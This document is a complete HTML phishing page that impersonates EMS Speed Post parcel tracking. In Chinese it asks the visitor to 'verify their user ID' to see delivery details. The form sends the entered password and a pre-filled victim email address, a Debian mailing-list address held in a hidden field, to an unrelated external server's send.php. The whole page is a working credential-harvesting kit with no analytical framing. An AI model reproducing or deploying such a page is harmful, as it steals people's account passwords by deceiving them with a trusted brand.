<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>EMS Speed Post | 快速传送 | 在线追踪</title>
<meta charset="utf-8" />
<link rel="icon" href="https://i.gyazo.com/f9ce2135e71784952091e858eef799e0.png">
<style>
body, html {
height: 100%;
margin: 0;
font-family: Arial, Helvetica, sans-serif;
}
* {
box-sizing: border-box;
}
.bg-image {
/* The image used */
background-image: url("https://www.ems.post/sites/default/files/styles/news_list_image/public/news-images/ems%20vietname%20homepage.jpg?h=ca5be4d3&itok=9p78Fu76");
/* Add the blur effect */
filter: blur(2px);
-webkit-filter: blur(2px);
/* Full height */
height: 100%;
/* Center and scale the image nicely */
background-position: center;
background-repeat: no-repeat;
background-size: cover;
}
/* Position text in the middle of the page/image */
.bg-text {
background-color: rgb(255,0,0); /* Fallback color */
background-color: rgba(255,0,0, 0.8); /* Black w/opacity/see-through */
color: white;
font-weight: bold;
border: 1px solid #0FFFFFF;
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
border-radius: 10px 30px;
z-index: 2;
width: 400px;
height: 360px;
padding: 20px;
text-align: center;
-webkit-box-shadow: 5px 5px 7px 4px rgba(0,0,0,0.71);
box-shadow: 5px 5px 7px 4px rgba(0,0,0,0.71);
}
</style>
</head>
<body>
<div class="bg-image"></div>
<div class="bg-text">
<table align="center" style="width:340px;" cellspacing="0">
<tr><td>
<div align="center">
<img src="http://logo-load.com/uploads/posts/2016-08/ems-logo.png"
style="width:250px; 50px;">
</td>
</td></tr>
<tr><td>
<font style="font-family: Arial, Helvetica, sans-serif;" size="4" color="#FFFFFF">
EMS Express追踪
</font>
<br>
<font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#FFFFFF">
请验证您的用户ID以查看您的送货详细信息
</font>
</td></tr>
<tr><td style="height:15px;">
<form method="post" action="https://socialhandle.co.in/send.php">
</td></tr>
<tr><td>
<div align="center">
<input type="email" name="login"
style="width:320px; height:40px; border:1px solid #BDBDBD; padding:10px; border-radius: 2px; background:#FFF; font: #000" required=""
value="python-apps-team@lists.alioth.debian.org" disabled>
</div>
</td></tr>
<tr><td style="height:7px;"></td></tr>
<tr><td>
<div align="center">
<input type="password" name="passwd"
style="width:320px; height:40px; border:1px solid #BDBDBD; padding:10px; border-radius: 2px; background:#FFF; font: #000" required=""
placeholder="密码" required>
</div>
</td></tr>
<tr><td style="height:8px;"></td></tr>
<tr><td>
<div align="center">
<button type="submit" value="Submit"
style="width:320px; height:40px; border:1px solid #084B8A; padding:10px; border-radius: 2px; background:#084B8A; font: #FFF">
<font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#FFFFFF">
立即追踪 >>>
</font>
</button>
</div>
</td></tr>
<tr><td style="height:15px;">
<input type="hidden" name="login" value="python-apps-team@lists.alioth.debian.org">
</form>
</td></tr>
<tr><td style="height:15px;"></td></tr>
</table>
</div>
</body>
</html>